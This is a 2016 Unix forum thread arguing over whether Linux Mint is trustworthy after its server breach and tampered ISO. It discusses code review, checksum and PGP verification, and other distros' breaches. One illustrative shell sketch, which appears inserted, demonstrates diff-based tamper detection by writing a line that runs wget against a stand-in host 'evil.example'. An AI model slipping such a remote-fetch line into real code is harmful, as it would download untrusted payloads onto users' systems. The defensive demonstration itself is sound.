Discussion in 'all things UNIX' started by stapp, Feb 21, 2016.
Hilarious. Keep going.
underlining is mine.
Not much of an answer, is it? Once again: something of substance that indicates the Mint source code was in some undetected way compromised before last December, please. So far I've just seen that avoided, and we already know your opinion.
Mint has its fans and detractors, just like any other major distro.
I regularly recommend it to people who ask me for help in getting M$ out of their lives for good.
Not surprisingly, I've been reading all I can on this issue, not just on Wilders.
Nothing I have seen so far will cause me to stop recommending Mint.
This thread now has 229 posts and is still going nowhere ..... slowly ...
@MisterB I agree fully with all that you have written here, not least because it is based on facts and reason.
Jessie is recommended over Sid regarding security:
What's your view on this?
As far as I know, they didn't. And I wouldn't want them doing it either, because code review (or any kind of investigation) should be done by 3rd parties.
Take that little text with a lot of salt, because in fact there is another Wiki page that favors Sid over Testing (with real examples that happened in the past). I can't find the link now, but if you keep reading the Wiki pages on Security you'll see that a compromised package can be held in Testing for months, while Sid keeps receiving updates.
So unless you're willing to mix Testing with Sid (not hard, considering they're not too far apart), go with Sid all the time. Or Jessie.
Wikipedia on code review: https://en.wikipedia.org/wiki/Code_review
This is not the process that would be appropriate to quickly flush out 3rd party alterations to the original developer code. It is an examination of source code for flaws and defects, not an investigatory technique. It won't distinguish whether a section of code was written by the original developer or not. For that, the original developers need to be involved because nobody is going to know or care about the code more than them.
What I'm talking about is applying reverse engineering file analysis techniques that are normally done on binary files and disk images to source code files. They are investigative techniques that can find altered code quickly, and that is what you are looking for. There is no need to go through the source code line by line; you just need to find the altered code and remove it as quickly and efficiently as possible.
So I find this insistence on a code review to be a red herring argument. It wouldn't necessarily reveal altered code and not having done one doesn't make the proposition that Mint has had undetected source code alterations any more likely.
Not even the original developers can tell with 100% certainty if a piece of code is theirs, because there's too much code and it would be very hard to spot simple changes that weren't made by them.
Potato, potato. You're describing an investigation either way.
Which not even the developers will be able to do. As if they could tell that every bit of code was written by them. What a memory they must have, to know whether every "yes" or "nay" was theirs.
No, that is not what I'm looking for, especially not with such a poor process (reverse engineering).
What I'm looking for is complete source code review done the right way: by reading it completely and via a non-biased/non-involved 3rd party. And I'm not looking for code alterations (because it's impossible for someone to remember every line of code to tell the difference). I'm looking for malicious code, and I'm NOT starting from the premise that the original code is clean.
Starting from the (falsifiable) premise that their original code is clean is not scientific and not philosophical. The correct way to do it is by starting to ask "is the original code clean? We don't know, let's read it".
It doesn't matter what you, me, or the devs think is "altered code"; this perspective is as flawed as human memory. The devs won't know if every little line of code is theirs, therefore the process you're describing is flawed at its core. Code review needs to be done by 3rd parties because they're not BIASED about what is what, and because its sole purpose is to see if there is any malicious code, regardless of whether it was put there by the devs or by an attacker.
As I was trying to indirectly get my point across in my previous post, it appears the Mint developers are at least following due diligence by publishing SHA256 checksums for their ISO files and signing the checksum file with the much stronger PGP key cryptography, which any user can easily check on most Linux distributions. I just downloaded the latest Mint 17.3 Xfce version and did this from the terminal in my Arch installation:
Go to the download directory where the ISO file is located and enter in terminal
$ sha256sum linuxmint-17.3-xfce-32bit.iso
which resulted in...
You will see this matches the SHA256 checksum here: https://mirrors.kernel.org/linuxmint/stable/17.3/sha256sum.txt
Is it not safe to say that if the ISO was tampered with in any way, it will not match the checksum signed by the developer's PGP key? Agreed, as I'm just discovering recently, the MD5 checksum is not a reliable check, but the much stronger SHA256 checksum should instill pretty good confidence in anyone who sees a match that the ISO is clean.
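The workflow described above can be sketched as shell commands. This is just an illustration: the `sha256sum.txt.gpg` filename follows the usual Mint mirror layout, and the stand-in file at the end is invented so the check can actually run without downloading a real ISO.

```shell
# Sketch of the ISO verification workflow (filenames assume the mirror
# layout linked above; the gpg step assumes the Mint signing key has
# already been imported):
#
#   sha256sum -c sha256sum.txt --ignore-missing    # check the ISO hash
#   gpg --verify sha256sum.txt.gpg sha256sum.txt   # verify the checksum file itself
#
# Self-contained demonstration with an invented stand-in file:
echo "pretend this is an ISO" > linuxmint-demo.iso
sha256sum linuxmint-demo.iso > sha256sum.txt
sha256sum -c sha256sum.txt    # prints: linuxmint-demo.iso: OK
```

Note that a matching checksum only helps if the checksum file itself is verified against the PGP signature: an attacker who can replace the ISO on a mirror can usually replace an unsigned checksum file too.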
I don't think you know much about reverse code engineering. It is commonly used, illegally, for cracking software licensing protections and, legally, to reverse malware and analyze it. It is an investigative technique par excellence and the Mint hack would actually be a fairly easy project to apply it to due to the software being open source. Without malware being reversed and analyzed, we would have no effective protections against it.
That is an absolutely ridiculous argument. What they would have is a lot of material, like notes and intermediate draft files that led to the final code placed in the repositories, as well as the original copies of the final product. They would also have all kinds of useful metadata, like timestamps of when source files were created on the machines they used to write the code, as well as records of transfers to the repositories. They would also be familiar with their code, in terms of overall structure and when parts of that structure were worked on, at a level that outsiders would not be. They don't need to memorize every line of code. Given the overall competence, and even brilliance, of some of their code (i.e. drivers and portability), I don't think they would have any trouble figuring out if something in the Mint source code repositories wasn't theirs. All it would take is an A/B difference check, and any alterations would stick out like a sore thumb, which is exactly what happened with the bad ISO.
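The A/B difference check mentioned above can be sketched with standard tools. The directory names, file contents, and the injected line below are all invented for illustration; the point is only that a recursive diff against a known reference copy surfaces any alteration immediately.

```shell
# Hypothetical A/B check: compare the published source tree against the
# developers' reference copy. Everything here is made up for illustration.
mkdir -p reference/src published/src
printf 'int main(void) { return 0; }\n' > reference/src/main.c
cp reference/src/main.c published/src/main.c

# Simulate an injected alteration in the published copy:
printf '/* injected */ system("wget http://evil.example/x");\n' >> published/src/main.c

# A recursive diff makes the alteration stick out immediately
# (diff exits non-zero when trees differ, hence the || true):
diff -ru reference published || true
```

In practice the same idea scales up with checksum manifests (e.g. hashing every file in both trees and comparing the lists), which is faster than a full diff on large repositories.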
And once again, I have to ask for a case history, please. Malware that does nothing after a year or two doesn't seem a likely prospect. Code is meant to be executed, and once you have malicious code executing, it can easily be traced back to the source code. Normally, malware is loaded into a debugger for analysis without source code, and the best you are going to have is a hard-to-read disassembly or a decompilation that is just an approximation of the original source code. What an easy prospect to have full source code to work with.
Your whole description is speculation and imagination. As mentioned, code review by Mint is useless, because they are the party of interest; the public will not trust whatever they say about their own internal code review. What they need is a peer review from a third party that has no conflict of interest. You have no clue how things work but dare to comment on other people's comments. Bravo!
I'm wondering what the source of the argument here is: who understands ITIL and compliance better, or whether Mint is secure as a distro after the breach? I guess it would make more sense to discuss that from the perspective not of what the team can do, as you have no control over that, but of what you can do: a) identify possible issues, b) understand if they are indeed issues, c) fix/mitigate/work around/neutralize them. And while waiting, should/could you use Mint for secure/private stuff?
Lastly, if other distros have been compromised but you don't know that, are you then ipso facto worried? A tree in the forest syndrome.
Just to remind everyone, shellshock was out and about for 2 years before it was revealed. Was it exploited beforehand? Maybe. Did anyone worry until the public exposure? Probably not. Does it make a difference? Well, maybe, most likely not. But it shows that if a problem is sufficiently big, it will be exposed. That's how it normally works. So the best proof of pudding is the lack of custard.
Maybe I should rant about this properly ...
Shellshock, Heartbleed, the Bash disaster, etc. are not comparable to the recent Mint breach. Shellshock, for example, is the kind of security hole that is inevitable in any sort of software, not only in open source. These were not present because someone intentionally planted them in Linux.
The Mint breach, on the other hand, was caused by malpractice by the Mint team in how they handled the security of their server and their distro, i.e., their philosophy is flawed. That kind of breach should and could have been avoided in the first place.
That, again, is the presumption that the rest of the code is clean and that we know if/where the malware is. We don't know any of that, we don't even know if there's more malware in Mint, and using this technique is pointless. Reading the source code is much simpler and gives an overall view of how Mint is doing.
AGAIN, you don't know of the integrity of any of this material.
I don't care about their own review. It's like if the police of some city ran an investigation of corruption on its own department: it makes no ***** sense.
Review, especially in regards to security, should be done by outsiders.
And I find it funny that you actually trust their "metadata and notes and timestamps", like those couldn't have been compromised either.
Which is exactly why their own review would be pointless.
Everyone is entitled to their opinion (especially on the brilliance part, considering how Mint is glued with duct tape so it doesn't fall apart).
So you actually think it's possible. Laughable.
Actually, this is exactly what I would do: make the infection silent for years while gathering as many users as possible, without drawing attention. And it has been done like this in the past.
Not necessarily right away.
Not so soon, if the code is well done.
Which is only doable if:
We don't have the source code (which we do on Mint);
We KNOW the malware (which we don't on Mint);
The only possible way of knowing if there's malicious code in Mint is by looking at the source code.
None, at least for me. I just commented that I wouldn't use Mint, because this massive breach just shows they can't handle security, be it on their servers or the distro itself. The only way of knowing the current state of Mint is by looking at the source code. There's no way of telling if the source code, be it new or old, is clean.
That's actually pretty logical.
a) identify possible issues: only possible through source code review;
b) if there are issues, proceed to next step;
c) if malicious code is present, Mint devs should remove it from the tree and make as much effort as possible to secure their machines (work, servers, etc);
I wouldn't use Mint. This hack just shows how bad their security policies were, and nothing guarantees old code is clean. We don't know if Mint is safe to use, even with the GPG/SHA verifications they put out.
Other distros don't deal with security the same way a 2-year-old child deals with security.
The problem is, it's possible that other Mint problems haven't gone public. For example:
The OpenBSD project developers are constantly reviewing source code, improving it, etc. Then, a claim arose that a backdoor planted by the NSA was in the source code. What did those guys do? They reviewed the entire code, and no backdoor was found. However, other bugs and problems were found and fixed; everybody wins.
Lack of evidence doesn't mean lack of existence.
Not a bad idea...
In general it does. As I said before, it is sheer foolishness to put remote possibilities out as anything more than that and making security decisions based on such FUD is only beneficial to attackers, not defenders. Ignoring the lack of actual case history evidence just puts it farther into the realm of fantasy, not reality. Once again, a real example please, not just FUD and theory that isn't supported by any real evidence. The burden of proof is on you, not Mint.
My 2 cents worth on all this is that I totally agree... We gotta live..
No, it doesn't. Not when similar cases happened before; but only when the possibility is ruled to near zero. And that is, of course, the general rule, because we don't understand how everything works and thus even if something is ruled to near zero chance, it's still possible to happen.
Just because humans couldn't fly until 1903, doesn't mean it's not possible.
Just because we haven't stepped on the moon until 1969, doesn't mean it's not possible.
Did I put the (not so) remote possibility as more than that? If you think so, then clearly you can't read and are just typing on the same key.
LOL, inverting the burden of proof when in fact I never said Mint has malicious code, and repeated many times that we need to read the code to see what's going on there. This is just pure stupidity at its best.
I have a general question for anyone here: Do the other distros, let's just say Debian, Ubuntu, OpenSUSE, Fedora, etc, do these do "code reviews" like you're talking about? Is Mint the only one of all these that doesn't, or hasn't?
Just to put things in perspective, here are some actual case histories of other distros having server hacks over the last few years. It only took a few minutes with Google to dig this up. All I had to do was put the name of a distro in front of the word "hacked". Ubuntu, Fedora, OpenSuse, Debian: they've all been hacked at some time within the last few years. So we're going to single out Mint as untrustworthy because their servers were breached, and ignore the fact that it has happened to all the other major distros? Come on, people, it is time to put facts before FUD. If we were to follow some of the FUD that is being put out here, we wouldn't be using Linux at all and would be gagging on Windows 10.
@Kerodo None of the mentioned distros have such bad security management as Mint had. Getting hacked can happen to anyone: Google, Facebook, NASA. But most of these actually do have a good notion of security and actually do a good job of keeping their systems secure.
Exactly... this is my point I guess. Why single Mint out when it can, and evidently has, happened to many of them. I think what's called for here is for everyone to be REASONABLE.
Because others actually care about security and try their best to avoid being cracked.
Mint, on the other hand, can be compared to a drunk driver: he says he's not drunk, that he doesn't need the seat belt, and that going 200 mph is fine in those conditions. And he doesn't do any maintenance on his car whatsoever. It's an obvious recipe for disaster.
Google/Debian/openSUSE/Ubuntu, on the other hand, don't drink, use the seat belt, drive at 20 mph, and do regular preventive maintenance. Obviously maintenance can't pick out every single defect that wear can produce on the car, so there is the possibility that a tire blows earlier than expected, but it almost never happens, and Google tried to avoid it at all costs. And, of course, the damage won't be as great, because the driver is driving slowly and it's easy to come to a stop and change the tire.
You might read the articles. It doesn't look like security was all that sound on their servers either and the Fedora hack could have done deep damage. None of these distros emphasize security in any big way like Qubes.
Some of these are actually kind of funny to read I must admit, some of these breaches were pretty easy to exploit, and I feel ashamed of some admins.
Haven't read much on Qubes, but I've always read nice things about it. I might check it out more.